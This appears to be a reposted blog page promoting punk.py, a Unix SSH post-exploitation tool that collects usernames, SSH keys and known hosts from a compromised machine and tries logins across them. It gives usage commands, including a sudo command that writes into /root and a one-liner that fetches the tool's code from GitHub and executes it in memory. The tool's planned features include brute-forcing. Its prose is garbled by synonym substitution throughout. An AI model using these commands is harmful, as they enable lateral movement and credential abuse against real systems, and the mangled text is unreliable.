Punk.Py - Unix Ssh Post-Exploitation Tool

unix SSH post-exploitation 1337 tool

how it works
punk.py is a post-exploitation tool meant to assistance network pivoting from a compromised unix box. It collect usernames, ssh keys in addition to known hosts from a unix system, in addition to hence it tries to connect via ssh to all the combinations found. punk.py is wrote inwards lodge to function on criterion python2 in addition to python3 installations.

examples
criterion execution:

  $ ./punk.py

skip passwd checks in addition to role a custom abode path:

  $ ./punk.py --no-passwd --home /home/ldapusers/

execute commands alongside sudo:

  $ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

one-liner fileless ( alongside --no-passwd parameter ):

  $ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO

improve mortal keys hunting including dsa keys
Recursion
SSH keys alongside password bruteforce
Hashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )

Download Punk.Py

Nexus

Punk.Py - Unix Ssh Post-Exploitation Tool

Recent Posts

Facebook

Nexus

Punk.Py - Unix Ssh Post-Exploitation Tool

You Might Also Like

Recent Posts

Facebook